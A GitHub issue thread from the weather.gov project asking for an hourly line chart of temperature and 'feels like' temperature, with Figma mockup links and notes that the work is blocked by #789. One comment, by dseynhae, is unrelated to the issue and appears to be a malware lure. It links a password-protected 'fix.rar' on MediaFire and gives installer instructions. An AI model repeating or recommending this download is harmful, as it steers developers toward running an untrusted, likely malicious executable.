### ISSUE TITLE
Visualization: Temp and Feels like, hourly, line

### ISSUE THREAD

**Issue by colinmurphy01** [weather-gov/weather.gov#1632]
[Mockup in context
](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=10757-245365&t=yrI9IMUri5KRaKev-4)

[Figma Documentation ](https://www.figma.com/design/w2QI2uTgaTWUPLHLi40mm1/Weather.gov-%E2%80%93-v0.2?node-id=11028-255541&t=yrI9IMUri5KRaKev-4)

Considerations:
- Blocked by #789 
- Implement within Hourly Details expansion (below tables) for now, while we wait on #1616

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by colinmurphy01** [comment]
Blocked by #789 first

**Comment by colinmurphy01** [comment]
Do not implement F/Cº switch
